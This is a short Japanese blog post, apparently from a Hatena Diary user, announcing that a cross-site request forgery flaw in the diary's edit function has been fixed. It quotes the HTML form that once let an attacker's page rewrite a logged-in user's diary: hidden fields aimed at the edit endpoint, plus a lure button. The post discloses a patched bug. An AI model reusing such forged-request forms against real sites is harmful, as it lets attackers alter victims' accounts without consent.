d:id:nyama:20041227:1104116475 とかで書いていた脆弱性がようやく修正された模様。以前は以下のような内容が書かれた html ファイルで、ボタンをクリックなんかすると日記を勝手に更新させることが可能だった。試してみたところ今は大丈夫です。

<form method="post" action="http://d.hatena.ne.jp/nyama/edit" enctype="multipart/form-data">
<p>10秒経っても変わらないときはボタンをクリック!
<input type="hidden" name="mode" value="enter" />
<input type="hidden" name="timestamp" value="20040913173912" />
<input type="hidden" name="date" value="20050913" />
<input type="hidden" class="field" name="year" size="4" value="0000" />
<input type="hidden" class="field" name="month" size="2" value="01" />
<input type="hidden" class="field" name="day" size="2" value="01" />
<input type="hidden" name="body" value="12月27日12:25" />
<input class="field" type="submit" name="edit" value="移動" />
</p>
</form>

これで一安心。